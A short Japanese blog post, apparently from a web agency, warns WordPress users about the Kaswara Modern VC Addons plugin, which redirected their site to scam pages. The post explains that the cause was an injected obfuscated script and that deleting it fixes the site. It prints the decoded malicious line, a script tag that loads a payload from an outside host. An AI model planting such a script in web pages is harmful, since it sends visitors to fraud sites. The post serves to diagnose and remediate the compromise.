WPBakery Page Builderを使って簡単にページレイアウトしたい。そんなwordpressユーザへ告ぐ!Kaswara Modern VC Addons プラグインを併用していませんか?もしかしたら、バグが埋め込まれているかもしれません。
先日に急遽、wordpress製のホームページが乗っ取られてしまったと連絡が入りました。そのページはちょっと前まで通常通り、デザインされたページが表示されていたのに、Kaswara Modern VC Addons プラグインを導入した途端、見ず知らずの詐欺サイトに遷移する事象が発生していました。
Kaswara Modern VC Addonsを隈なく探してみると、以下にこんなスクリプトが・・・
この”var _0x230d”から始まるコードは難読化されたスクリプト分でデコードすると以下になります。※悪用禁止ですよ!
<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>Code language: HTML, XML (xml)このコードが悪さをしていたようです。この難読化されたコードを消せば、Kaswara Modern VC Addonsを無事に使うことができます。
今回の真の原因はこちらの記事に記載がありました。いわゆるゼロディ攻撃によるユーザ特権の昇格バグを利用されたようです。細い話はともかく、当件でお困りの際は、ぜひご参考ください。
キャクヨセへのお仕事依頼はこちらからよろしくお願いいたします!